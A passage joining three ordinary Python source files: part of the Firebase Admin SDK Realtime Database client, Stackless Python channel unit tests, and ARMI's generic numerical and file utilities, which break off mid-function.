client_cache_key = (base_url, json.dumps(params, sort_keys=True))
if client_cache_key not in self._clients:
client = _Client(credential, base_url, self._timeout, params)
self._clients[client_cache_key] = client
return self._clients[client_cache_key]
def _get_emulator_config(self, parsed_url):
"""Checks whether the SDK should connect to the RTDB emulator."""
EmulatorConfig = collections.namedtuple('EmulatorConfig', ['base_url', 'namespace'])
if parsed_url.scheme != 'https':
# Emulator mode enabled by passing http URL via AppOptions
base_url, namespace = _DatabaseService._parse_emulator_url(parsed_url)
return EmulatorConfig(base_url, namespace)
if self._emulator_host:
# Emulator mode enabled via environment variable
base_url = 'http://{0}'.format(self._emulator_host)
namespace = parsed_url.netloc.split('.')[0]
return EmulatorConfig(base_url, namespace)
return None
@classmethod
def _parse_emulator_url(cls, parsed_url):
"""Parses emulator URL like http://localhost:8080/?ns=foo-bar"""
query_ns = parse.parse_qs(parsed_url.query).get('ns')
if parsed_url.scheme != 'http' or (not query_ns or len(query_ns) != 1 or not query_ns[0]):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a valid URL to a '
'Firebase Realtime Database instance.'.format(parsed_url.geturl()))
namespace = query_ns[0]
base_url = '{0}://{1}'.format(parsed_url.scheme, parsed_url.netloc)
return base_url, namespace
@classmethod
def _get_auth_override(cls, app):
auth_override = app.options.get('databaseAuthVariableOverride', cls._DEFAULT_AUTH_OVERRIDE)
if auth_override == cls._DEFAULT_AUTH_OVERRIDE or auth_override is None:
return auth_override
if not isinstance(auth_override, dict):
raise ValueError('Invalid databaseAuthVariableOverride option: "{0}". Override '
'value must be a dict or None.'.format(auth_override))
return auth_override
def close(self):
for value in self._clients.values():
value.close()
self._clients = {}
class _Client(_http_client.JsonHttpClient):
"""HTTP client used to make REST calls.
_Client maintains an HTTP session, and handles authenticating HTTP requests along with
marshalling and unmarshalling of JSON data.
"""
def __init__(self, credential, base_url, timeout, params=None):
"""Creates a new _Client from the given parameters.
This exists primarily to enable testing. For regular use, obtain _Client instances by
calling the from_app() class method.
Args:
credential: A Google credential that can be used to authenticate requests.
base_url: A URL prefix to be added to all outgoing requests. This is typically the
Firebase Realtime Database URL.
timeout: HTTP request timeout in seconds. If set to None connections will never
timeout, which is the default behavior of the underlying requests library.
params: Dict of query parameters to add to all outgoing requests.
"""
super().__init__(
credential=credential, base_url=base_url,
timeout=timeout, headers={'User-Agent': _USER_AGENT})
self.credential = credential
self.params = params if params else {}
def request(self, method, url, **kwargs):
"""Makes an HTTP call using the Python requests library.
Extends the request() method of the parent JsonHttpClient class. Handles default
params like auth overrides, and low-level exceptions.
Args:
method: HTTP method name as a string (e.g. get, post).
url: URL path of the remote endpoint. This will be appended to the server's base URL.
kwargs: An additional set of keyword arguments to be passed into requests API
(e.g. json, params).
Returns:
Response: An HTTP response object.
Raises:
FirebaseError: If an error occurs while making the HTTP call.
"""
query = '&'.join('{0}={1}'.format(key, self.params[key]) for key in self.params)
extra_params = kwargs.get('params')
if extra_params:
if query:
query = extra_params + '&' + query
else:
query = extra_params
kwargs['params'] = query
try:
return super(_Client, self).request(method, url, **kwargs)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
def create_listener_session(self):
return _sseclient.KeepAuthSession(self.credential)
@classmethod
def handle_rtdb_error(cls, error):
"""Converts an error encountered while calling RTDB into a FirebaseError."""
if error.response is None:
return _utils.handle_requests_error(error)
message = cls._extract_error_message(error.response)
return _utils.handle_requests_error(error, message=message)
@classmethod
def _extract_error_message(cls, response):
"""Extracts an error message from an error response.
If the server has sent a JSON response with an 'error' field, which is the typical
behavior of the Realtime Database REST API, parses the response to retrieve the error
message. If the server has sent a non-JSON response, returns the full response
as the error message.
"""
message = None
try:
# RTDB error format: {"error": "text message"}
data = response.json()
if isinstance(data, dict):
message = data.get('error')
except ValueError:
pass
if not message:
message = 'Unexpected response from database: {0}'.format(response.content.decode())
return message
|
test_channel.py
|
from __future__ import absolute_import
import unittest
import stackless
try:
import threading
withThreads = True
except ImportError:
withThreads = False
import sys
import traceback
import contextlib
from support import test_main # @UnusedImport
from support import StacklessTestCase, require_one_thread
@contextlib.contextmanager
def block_trap(trap=True):
"""
A context manager to temporarily set the block trap state of the
current tasklet. Defaults to setting it to True
"""
c = stackless.getcurrent()
old = c.block_trap
c.block_trap = trap
try:
yield
finally:
c.block_trap = old
class TestChannels(StacklessTestCase):
def testBlockingSend(self):
''' Test that when a tasklet sends to a channel without waiting receivers, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.send(1)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding receiver")
# The channel should have a balance indicating one blocked sender.
self.assertTrue(channel.balance == 1, "The channel balance should indicate one blocked sender waiting for a corresponding receiver")
def testBlockingReceive(self):
''' Test that when a tasklet receives from a channel without waiting senders, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.receive()
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding sender")
# The channel should have a balance indicating one blocked sender.
self.assertEqual(channel.balance, -1, "The channel balance should indicate one blocked receiver waiting for a corresponding sender")
def testNonBlockingSend(self):
''' Test that when there is a waiting receiver, we can send without blocking with normal channel behaviour. '''
originalValue = 1
receivedValues = []
# Function to block when run in a tasklet.
def f(testChannel):
receivedValues.append(testChannel.receive())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
channel.send(originalValue)
finally:
stackless.getcurrent().block_trap = oldBlockTrap
self.assertTrue(len(receivedValues) == 1 and receivedValues[0] == originalValue, "We sent a value, but it was not the one we received. Completely unexpected.")
def testNonBlockingReceive(self):
''' Test that when there is a waiting sender, we can receive without blocking with normal channel behaviour. '''
originalValue = 1
# Function to block when run in a tasklet.
def f(testChannel, valueToSend):
testChannel.send(valueToSend)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel, originalValue)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
value = channel.receive()
finally:
stackless.getcurrent().block_trap = oldBlockTrap
tasklet.kill()
self.assertEqual(value, originalValue, "We received a value, but it was not the one we sent. Completely unexpected.")
@require_one_thread
def testMainTaskletBlockingWithoutASender(self):
''' Test that the last runnable tasklet cannot be blocked on a channel. '''
c = stackless.channel()
self.assertRaises(RuntimeError, c.receive)
@unittest.skipUnless(withThreads, "Compiled without threading")
def testInterthreadCommunication(self):
''' Test that tasklets in different threads sending over channels to each other work. '''
commandChannel = stackless.channel()
def master_func():
commandChannel.send("ECHO 1")
commandChannel.send("ECHO 2")
commandChannel.send("ECHO 3")
commandChannel.send("QUIT")
def slave_func():
while 1:
command = commandChannel.receive()
if command == "QUIT":
break
def scheduler_run(tasklet_func):
t = stackless.tasklet(tasklet_func)()
while t.alive:
stackless.run()
thread = threading.Thread(target=scheduler_run, args=(master_func,))
thread.start()
scheduler_run(slave_func)
def testSendException(self):
# Function to send the exception
def f(testChannel):
testChannel.send_exception(ValueError, 1, 2, 3)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError as e:
self.assertEqual(e.args, (1, 2, 3))
def testSendThrow(self):
# subfunction in tasklet
def bar():
raise ValueError(1, 2, 3)
# Function to send the exception
def f(testChannel):
try:
bar()
except Exception:
testChannel.send_throw(*sys.exc_info())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError:
exc, val, tb = sys.exc_info()
self.assertEqual(val.args, (1, 2, 3))
# Check that the traceback is correct
l = traceback.extract_tb(tb)
self.assertEqual(l[-1][2], "bar")
def testBlockTrapSend(self):
'''Test that block trapping works when receiving'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.send, None)
count[0] += 1
# Test on main tasklet and on worker
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
def testBlockTrapRecv(self):
'''Test that block trapping works when receiving'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.receive)
count[0] += 1
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
class TestClose(StacklessTestCase):
"""Test using close semantics with channels"""
def setUp(self):
super(TestClose, self).setUp()
self.c = stackless.channel()
# TODO: This test shows how ill conceived the current closing/closed semantics are.
# See https://bitbucket.org/stackless-dev/stackless/issues/53
def testSequence(self):
def sender():
self.c.send_sequence(range(10))
self.c.close()
# this needs to change, close does not wake up a receiver, we must pump it
while self.c.closing and not self.c.closed:
self.c.send(None)
data = []
def receiver():
for i in self.c:
data.append(i)
# remove the extra "pump" nones at the end....
while data[-1] is None:
data.pop(-1)
data.append(10)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(11)))
self.assertTrue(self.c.closed)
def testSequence2(self):
def sender():
length = self.c.send_sequence(range(10))
self.assertEqual(length, 10)
# A future version of Stackless may send StopIteration
# automatically, if you close the channel
# See https://bitbucket.org/stackless-dev/stackless/issues/53
self.c.send_exception(StopIteration)
self.c.close()
data = []
def receiver():
for i in self.c:
data.append(i)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(10)))
self.assertTrue(self.c.closed)
def testSender(self):
self.c.close()
self.assertRaises(ValueError, self.c.send, None)
def testReceiver(self):
self.c.close()
self.assertRaises(ValueError, self.c.receive)
def testIterator(self):
self.c.close()
i = iter(self.c)
def n():
return next(i)
self.assertRaises(StopIteration, n)
class Subclassing(StacklessTestCase):
def test_init(self):
"""Test that we can subclass channel without overriding __new__"""
class myclass(stackless.channel):
def __init__(self, name):
super(myclass, self).__init__()
self.name = name
name = "bong"
c = myclass(name)
self.assertEqual(c.name, name)
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
__init__.py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic ARMI utilities"""
import os
import sys
import time
import pickle
import re
import pkgutil
import importlib
import traceback
import getpass
import math
import datetime
import tempfile
import shutil
import threading
import subprocess
import collections
import hashlib
import numpy
import scipy.optimize as sciopt
import armi
from armi import runLog
from armi.utils import iterables
from armi.utils.flags import Flag
# Read in file 1 MB at a time to reduce memory burden of reading entire file at once
_HASH_BUFFER_SIZE = 1024 * 1024
# special pattern to deal with FORTRAN-produced scipats without E, like 3.2234-234
SCIPAT_SPECIAL = re.compile(r"([+-]?\d*\.\d+)[eEdD]?([+-]\d+)")
def coverageReportHelper(config, dataPaths):
"""
Small utility function to generate coverage reports.
This was created to side-step the difficulties in submitting multi-line python
commands on-the-fly.
This combines data paths and then makes html and xml reports for the
fully-combined result.
"""
from coverage import Coverage
import coverage
try:
cov = Coverage(config_file=config)
if dataPaths:
# fun fact: if you combine when there's only one file, it gets deleted.
cov.combine(data_paths=dataPaths)
cov.save()
else:
cov.load()
cov.html_report()
cov.xml_report()
except PermissionError as e:
# Some file systems have some issues with filenames that start with a '.', such as the
# .coverage files. If a permissions error is raised, it likely has something to
# do with that. We changed the COVERAGE_RESULTS_FILE in cases.py for this reason.
runLog.error(
f"There was an issue in generating coverage reports due "
f"to the following permissions error: {e}"
)
# disabled until we figure out the problem.
# raise
except coverage.misc.CoverageException as e:
# This is happening when forming the unit test coverage report. This may be
# caused by the TestFixture coverage report gobbling up all of the coverage
# files before the UnitTests.cov_report task gets a chance to see them. It may
# simply be that we dont want a coverage report generated for the TestFixture.
# Something to think about. Either way, we do not want to fail the job just
# because of this
runLog.error(
"There was an issue generating coverage reports "
"({}):\n{}".format(type(e), e.args)
)
def getFileSHA1Hash(filePath, digits=40):
"""
Generate a SHA-1 hash of the input file.
Parameters
----------
filePath : str
Path to file to obtain the SHA-1 hash
digits : int, optional
Number of digits to include in the hash (40 digit maximum for SHA-1)
"""
sha1 = hashlib.sha1()
with open(filePath, "rb") as f:
while True:
data = f.read(_HASH_BUFFER_SIZE)
if not data:
break
sha1.update(data)
return sha1.hexdigest()[:digits]
def efmt(a: str) -> str:
r"""Converts string exponential number to another string with just 2 digits in the exponent."""
# this assumes that none of our numbers will be more than 1e100 or less than 1e-100...
if len(a.split("E")) != 2:
two = a.split("e")
else:
two = a.split("E")
# print two
exp = two[1] # this is '+002' or '+02' or something
if len(exp) == 4: # it has 3 digits of exponent
exp = exp[0] + exp[2:] # gets rid of the hundred's place digit
return two[0] + "E" + exp
def fixThreeDigitExp(strToFloat: str) -> float:
"""
Convert FORTRAN numbers that cannot be converted into floats.
Notes
-----
Converts a number line "9.03231714805651-101" (no e or E) to "9.03231714805651e-101".
Some external depletion kernels currently need this fix. From contact with developer:
The notation like 1.0-101 is a FORTRAN thing, with history going back to the 60's.
They will only put E before an exponent 99 and below. Fortran will also read these guys
just fine, and they are valid floating point numbers. It would not be a useful effort,
in terms of time, trying to get FORTRAN to behave differently.
The approach has been to write a routine in the reading code which will interpret these.
This helps when the scientific number exponent does not fit.
"""
match = SCIPAT_SPECIAL.match(strToFloat)
return float("{}E{}".format(*match.groups()))
def findClosest(listToSearch, val, indx=False):
r"""
find closest item in a list.
Parameters
----------
listToSearch : list
The list to search through
val : float
The target value that is being searched for in the list
indx : bool, optional
If true, returns minVal and minIndex, otherwise, just the value
Returns
-------
minVal : float
The item in the listToSearch that is closest to val
minI : int
The index of the item in listToSearch that is closest to val. Returned if indx=True.
"""
d = float("inf")
minVal = None
minI = None
for i, item in enumerate(listToSearch):
if abs(item - val) < d:
d = abs(item - val)
minVal = item
minI = i
if indx:
return minVal, minI
else:
# backwards compatibility
return minVal
def copyWithoutBlocking(src, dest):
"""
Copy a file in a separate thread to avoid blocking while IO completes.
Useful for copying large files while ARMI moves along.
"""
files = "{} to {}".format(src, dest)
runLog.extra("Copying (without blocking) {}".format(files))
t = threading.Thread(target=shutil.copy, args=(src, dest))
t.start()
return t
def linearInterpolation(x0, y0, x1, y1, targetX=None, targetY=None):
r"""
does a linear interpolation (or extrapolation) for y=f(x)
Parameters
----------
x0,y0,x1,y1 : float
Coordinates of two points to interpolate between
targetX : float, optional
X value to evaluate the line at
targetY : float, optional
Y value we want to find the x value for (inverse interpolation)
Returns
-------
interpY : float
The value of y(targetX), if targetX is not None
interpX : float
The value of x where y(x) = targetY (if targetY is not None)
y = m(x-x0) + b
x = (y-b)/m
"""
if x1 == x0:
raise ZeroDivisionError("The x-values are identical. Cannot interpolate.")
m = (y1 - y0) / (x1 - x0)
b = -m * x0 + y0
if targetX is not None:
return m * targetX + b
else:
return (targetY - b) / m
def parabolaFromPoints(p1, p2, p3):
r"""
find the parabola that passes through three points
We solve a simultaneous equation with three points.
A = x1**2 x1 1
x2**2 x2 1
x3**2 x3 1
b = y1
y2
y3
find coefficients Ax=b
Parameters
----------
p1 : tuple
first point (x,y) coordinates
p2,p3: tuple, second and third points.
Returns
-------
a,b,c coefficients of y=ax^2+bx+c
"""
A = numpy.array(
[[p1[0] ** 2, p1[0], 1], [p2[0] ** 2, p2[0], 1], [p3[0] ** 2, p3[0], 1]]
)
b = numpy.array([[p1[1]], [p2[1]], [p3[1]]])
try:
x = numpy.linalg.solve(A, b)
except:
print("Error in parabola {} {}".format(A, b))
raise
return float(x[0]), float(x[1]), float(x[2])
def parabolicInterpolation(ap, bp, cp, targetY):
r"""
Given parabola coefficients, this interpolates the time
that would give k=targetK.
keff = at^2+bt+c
We want to solve a*t^2+bt+c-targetK = 0.0 for time.
if there are real roots, we should probably take the smallest one
because the larger one might be at very high burnup.
If there are no real roots, just take the point where the deriv ==0, or
2at+b=0, so t = -b/2a
The slope of the curve is the solution to 2at+b at whatever t has been determined
Parameters
----------
ap, bp,cp : floats
coefficients of a parabola y = ap*x^2 + bp*x + cp
targetK : float
The keff to find the cycle length of
Returns
-------
realRoots : list of tuples
(root, slope)
The best guess of the cycle length that will give k=targetK
If no positive root was found, this is the maximum of the curve. In that case,
it will be a negative number. If there are two positive roots, there will be two entries.
slope : float
The slope of the keff vs. time curve at t=newTime
"""
roots = numpy.roots([ap, bp, cp - targetY])
realRoots = []
for r in roots:
if r.imag == 0 and r.real > 0:
realRoots.append((r.real, 2.0 * ap * r.real + bp))
if not realRoots:
# no positive real roots. Take maximum and give up for this cyclic.
newTime = -bp / (2 * ap)
if newTime < 0:
raise RuntimeError("No positive roots or maxima.")
slope = 2.0 * ap * newTime + bp
newTime = (
-newTime
) # return a negative newTime to signal that it is not expected to be critical.
realRoots = [(newTime, slope)]
return realRoots
def getFloat(val):
r"""returns float version of val, or None if it's impossible. Useful for converting
user-input into floats when '' might be possible."""
try:
newVal = float(val)
return newVal
except:
return None
def relErr(v1: float, v2: float) -> float:
if v1:
return (v2 - v1) / v1
else:
return -1e99
def getTimeStepNum(cycleNumber, subcycleNumber, cs):
"""Return the timestep associated with cycle and tn.
Parameters
----------
cycleNumber : int, The cycle number
subcycleNumber : int, The intra-cycle time node (0 for BOC, etc.)
cs : Settings object
"""
return cycleNumber * getNodesPerCycle(cs) + subcycleNumber
def getCycleNode(timeStepNum, cs):
"""
Return the (cycle, node) corresponding to a cumulative time step number.
Parameters
----------
timeStepNum
The cumulative number of time steps since the beginning
cs
A case Settings object to get the nodes-per-cycle from
"""
nodesPerCycle = getNodesPerCycle(cs)
return (timeStepNum // nodesPerCycle, timeStepNum % nodesPerCycle)
def getNodesPerCycle(cs):
"""Return the number of nodes per cycles for this case settings."""
return cs["burnSteps"] + 1
def getPreviousTimeStep(cycle, node, burnSteps):
"""Return the time step before the specified time step"""
if (cycle, node) == (0, 0):
raise ValueError("There is not Time step before (0, 0)")
if node != 0:
return (cycle, node - 1)
else:
# index starts at zero, so the last node in a cycle is equal to the number of
# burn steps.
return (cycle - 1, burnSteps)
def tryPickleOnAllContents(obj, ignore=None, path=None, verbose=False):
r"""
Attempts to pickle all members of this object and identifies those who cannot be pickled.
Useful for debugging MPI-bcast errors
Not recursive yet. Would be nice to have it loop through nested objects (blocks in assems in reactors)
Parameters
----------
obj : object
Any object to be tested.
ignore : iterable
list of string variable names to ignore.
path : str
the path in which to test pickle.
verbose : bool, optional
Print all objects whether they fail or not
"""
if ignore is None:
ignore = []
# pickle gives better error messages than cPickle
for name, ob in obj.__dict__.items():
if name not in ignore:
if verbose:
print("Checking {0}...".format(name))
try:
pickle.dumps(ob) # dump as a string
except:
print(
"{0} in {1} cannot be pickled. It is: {2}. ".format(name, obj, ob)
)
# traceback.print_exc(limit=0,file=sys.stdout)
def tryPickleOnAllContents2(*args, **kwargs):
# helper
print(doTestPickleOnAllContents2(*args, **kwargs))
def doTestPickleOnAllContents2(obj, ignore=None, path=None, verbose=False):
r"""
Attempts to find one unpickleable object in a nested object
Returns
-------
pickleChain : list
list of names in a chain that are unpickleable. Just one example per object
e.g. ['r','assemblies','A101','lib] means the lib is unpicklable.
"""
if ignore is None:
ignore = []
unpickleable = []
if not hasattr(obj, "__dict__"):
print("done")
return unpickleable
for name, ob in obj.__dict__.items():
print(("checking ", name))
if name not in ignore:
try:
pickle.dumps(ob) # dump as a string
except:
unpickleable.append(name)
print("Cant pickle {0}".format(name))
# recursive call.
unpickleable.extend(
doTestPickleOnAllContents2(ob, ignore=unpickleable + ignore)
)
return unpickleable
class MyPickler(pickle.Pickler):
r"""
The big guns. This will find your pickle errors if all else fails.
Use with tryPickleOnAllContents3.
"""
def save(self, obj):
try:
pickle.Pickler.save(self, obj)
except Exception:
_excType, excValue, _excTraceback = sys.exc_info()
print("Object that failed: {}. Err: {}".format(obj, excValue))
raise
def tryPickleOnAllContents3(obj, ignore=None, path=None, verbose=False):
"""
Definitely find pickle errors
Notes
-----
In this form, this just finds one pickle error and then crashes. If you want
to make it work like the other testPickle functions and handle errors, you could.
But usually you just have to find one unpickleable SOB.
"""
with tempfile.TemporaryFile() as output:
try:
MyPickler(output).dump(obj)
except (pickle.PicklingError, TypeError):
pass
def classesInHierarchy(obj, classCounts, visited=None):
"""
Count the number of instances of each class contained in an objects heirarchy.
"""
if not isinstance(classCounts, collections.defaultdict):
raise TypeError(
"Need to pass in a default dict for classCounts (it's an out param)"
)
if visited is None:
classCounts[type(obj)] += 1
visited = set()
visited.add(id(obj))
try:
for c in obj.__dict__.values():
if id(c) not in visited:
classCounts[type(c)] += 1
visited.add(id(c))
classesInHierarchy(c, classCounts, visited=visited)
except AttributeError:
pass
def slantSplit(val, ratio, nodes, order="low first"):
r"""
Returns a list of values whose sum is equal to the value specified.
The ratio between the highest and lowest value is equal to the specified ratio,
and the middle values trend linearly between them.
"""
val = float(val)
ratio = float(ratio)
nodes = int(nodes)
v0 = 2.0 * val / (nodes * (1.0 + ratio))
X = []
for i in range(nodes):
X.append(v0 + i * (v0 * ratio - v0) / (nodes - 1))
if order == "high first":
X.reverse()
return X
def newtonsMethod(
func, goal, guess, maxIterations=None, cs=None, positiveGuesses=False
):
r"""
Solves a Newton's method with the given function, goal value, and first guess.
Parameters
----------
func : function
The function that guess will be changed to try to make it return the goal value.
goal : float
The function will be changed until it's return equals this value.
guess : float
The first guess value to do Newton's method on the func.
maxIterations : int
The maximum number of iterations that the Newton's method will be allowed to perform.
Returns
-------
ans : float
The guess that when input to the func returns the goal.
"""
def goalFunc(guess, func, positiveGuesses):
if positiveGuesses is True:
guess = abs(guess)
funcVal = func(guess)
val = abs(goal - funcVal)
return val
if (maxIterations is None) and (cs is not None):
maxIterations = cs["maxNewtonsIterations"]
# try:
ans = float(
sciopt.newton(
goalFunc,
guess,
args=(func, positiveGuesses),
tol=1.0e-3,
maxiter=maxIterations,
)
)
if positiveGuesses is True:
ans = abs(ans)
return ans
def minimizeScalarFunc(
func,
goal,
guess,
maxIterations=None,
cs=None,
positiveGuesses=False,
method=None,
tol=1.0e-3,
):
r"""
Use scipy minimize with the given function, goal value, and first guess.
Parameters
----------
func : function
The function that guess will be changed to try to make it return the goal value.
goal : float
The function will be changed until it's return equals this value.
guess : float
The first guess value to do Newton's method on the func.
maxIterations : int
The maximum number of iterations that the Newton's method will be allowed to perform.
Returns
-------
ans : float
The guess that when input to the func returns the goal.
"""
def goalFunc(guess, func, positiveGuesses):
if positiveGuesses is True:
guess = abs(guess)
funcVal = func(guess)
val = abs(goal - funcVal)
return val
if (maxIterations is None) and (cs is not None):
maxIterations = cs["maxNewtonsIterations"]
X = sciopt.minimize(
goalFunc,
guess,
args=(func, positiveGuesses),
method=method,
tol=tol,
options={"maxiter": maxIterations},
)
ans = float(X["x"])
if positiveGuesses is True:
ans = abs(ans)
return ans
def runFunctionFromAllModules(funcName, *args, **kwargs):
r"""
Runs funcName on all modules of ARMI, if it exists.
Parameters
----------
funcName : str
The function to run if it is found in a module.
\*args, \*\*kwargs : arguments to pass to func if it is found
Notes
-----
This imports all modules in ARMI, and if you have a script that isn't inside a
``if __name__=='__main__'``, you will be in trouble.
This could also be useful for finding input consistency checkers for the GUI.
See Also
--------
armi.settings.addAllDefaultSettings : gets all the settings from all modules
"""
for _modImporter, name, _ispkg in pkgutil.walk_packages(
path=armi.__path__, prefix=armi.__name__ + "."
):
try:
mod = importlib.import_module(name)
if funcName in dir(mod): # there is a module.funcName. so call it.
func = getattr(mod, funcName)
func(*args, **kwargs)
except:
# just print traceback but don't throw an error.
traceback.print_exc()
# TODO: move to pathTools
def mkdir(dirname):
r"""
Keeps trying to make a directory, outputting whatever errors it encounters,
until it is successful.
Parameters
----------
dirname : str
Path to the directory to create.
What you would normally pass to os.mkdir.
"""
numTimesTried = 0
while numTimesTried < 1000:
try:
os.mkdir(dirname)
break
except FileExistsError:
break
except Exception as err:
numTimesTried += 1
# Only ouput err every 10 times.
if numTimesTried % 10 == 0:
print(err)
# Wait 0.5 seconds, try again.
time.sleep(0.5)
def prependToList(originalList, listToPrepend):
"""
Add a new list to the beginnning of an original list.
Parameters
----------
originalList : list
The list to prepend to.
listToPrepend : list
The list to add to the beginning of (prepend) the originalList.
Returns
-------
originalList : list
The original list with the listToPrepend at it's beginning.
"""
listToPrepend.reverse()
originalList.reverse()
originalList.extend(listToPrepend)
originalList.reverse()
listToPrepend.reverse()
return originalList
def capStrLen(s: str, length: int) -> str:
"""
Truncates a string to a certain length.
Adds '...' if it's too long.
Parameters
----------
s : str
The string to cap at length l.
length : int
The maximum length of the string s.
"""
if length <= 2:
raise Exception("l must be at least 3 in utils.capStrLen")
if len(s) <= length:
return s
return s[0 : length - 3] + "..."
def list2str(strings, width=None, preStrings=None, fmt=None):
"""
Turn a list of strings into one string, applying the specified format to each.
Parameters
----------
strings : list
The items to create centered strings in the line for.
Can be str, float, int, etc.
width : int, optional
The maximum width that the strings are allowed to take up.
Only strings are affected by this parameter, because it does
not make sense to truncate ints or floats.
preStrings : list of str, optional
Any strings that come before the centered strings.
fmt : str, optional
The format to apply to each string, such as
' >4d', '^12.4E'.
"""
if preStrings is None:
preStrings = []
if fmt is None:
fmt = ""
newStrings = []
for string in strings:
if isinstance(string, str) and width is not None:
string = capStrLen(str(string), width)
string = "{0:{fmt}}".format(string, fmt=fmt)
newStrings.append(string)
preStrings.extend(newStrings)
return "".join(preStrings)
def createFormattedStrWithDelimiter(
dataList, maxNumberOfValuesBeforeDelimiter=9, delimiter="\n"
):
r"""
Return a formatted string with delimiters from a list of data.
Parameters
----------
dataList : list
List of data that will be formatted into a string
maxNumberOfValuesBeforeDelimiter : int
maximum number of values to have before the delimiter is added
delimiter : str
A delimiter on the formatted string (default: "\n")
Notes
-----
As an example::
>>> createFormattedStrWithDelimiter(['hello', 'world', '1', '2', '3', '4'],
... maxNumberOfValuesBeforeDelimiter=3, delimiter = '\n')
"hello, world, 1, \n2, 3, \n4, 5\n"
"""
formattedString = ""
if not dataList:
return formattedString
if not maxNumberOfValuesBeforeDelimiter:
numRows = 1
else:
numRows = (
int(
math.ceil(
float(len(dataList)) / float(maxNumberOfValuesBeforeDelimiter)
)
)
or 1
)
# Create a list of string delimiters to use when joining the strings
commaList = ["," for d in dataList]
commaList[-1] = ""
dataList = [str(d) + commaList[i] for i, d in enumerate(dataList)]
for splitList in iterables.split(dataList, n=numRows, padWith=""):
formattedString += " ".join(splitList) + delimiter
return formattedString
def rotateXY(x, y, degreesCounterclockwise=None, radiansCounterclockwise=None):
"""
Rotates x, y coordinates
Parameters
----------
x, y : array_like
coordinates
degreesCounterclockwise : float
Degrees to rotate in the CCW direction
radiansCounterclockwise : float
Radians to rotate in the CCW direction
Returns
-------
xr, yr : array_like
the rotated coordinates.
"""
if radiansCounterclockwise is None:
radiansCounterclockwise = degreesCounterclockwise * math.pi / 180.0
sinT = math.sin(radiansCounterclockwise)
cosT = math.cos(radiansCounterclockwise)
rotationMatrix = numpy.array([[cosT, -sinT], [sinT, cosT]])
xr, yr = rotationMatrix.dot(numpy.vstack((x, y)))
if len(xr) > 1:
## Convert to lists because everyone prefers lists for some reason
return xr.tolist(), yr.tolist()
else:
## Convert to scalar for consistency with old implementation
return xr[0], yr[0]
def convertToSlice(x, increment=False):
"""
Convert a int, float, list of ints or floats, None, or slice
to a slice. Also optionally increments that slice to make it easy to line
up lists that don't start with 0.
Use this with numpy.array (numpy.ndarray) types to easily get selections of it's elements.
Parameters
----------
x : multiple types allowed.
int: select one index.
list of int: select these index numbers.
None: select all indices.
slice: select this slice
Returns
-------
slice : slice
Returns a slice object that can be used in an array
like a[x] to select from its members.
Also, the slice has its index numbers decremented by 1.
It can also return a numpy array, which can be used
to slice other numpy arrays in the same way as a slice.
Examples
--------
a = numpy.array([10, 11, 12, 13])
>>> convertToSlice(2)
slice(2, 3, None)
>>> a[convertToSlice(2)]
array([12])
>>> convertToSlice(2, increment=-1)
slice(1, 2, None)
>>> a[convertToSlice(2, increment=-1)]
array([11])
>>> a[convertToSlice(None)]
array([10, 11, 12, 13])
>>> a[utils.convertToSlice([1, 3])]
array([11, 13])
>>> a[utils.convertToSlice([1, 3], increment=-1)]
array([10, 12])
>>> a[utils.convertToSlice(slice(2, 3, None), increment=-1)]
array([11])
"""
if increment is False:
increment = 0
if not isinstance(increment, int):
raise Exception("increment must be False or an integer in utils.convertToSlice")
if x is None:
x = numpy.s_[:]
if isinstance(x, list):
x = numpy.array(x)
if isinstance(x, (int, numpy.integer)) or isinstance(x, (float, numpy.floating)):
x = slice(int(x), int(x) + 1, None)
# Correct the slice indices to be group instead of index based.
# The energy groups are 1..x and the indices are 0..x-1.
if isinstance(x, slice):
if x.start is not None:
jstart = x.start + increment
else:
jstart = None
if x.stop is not None:
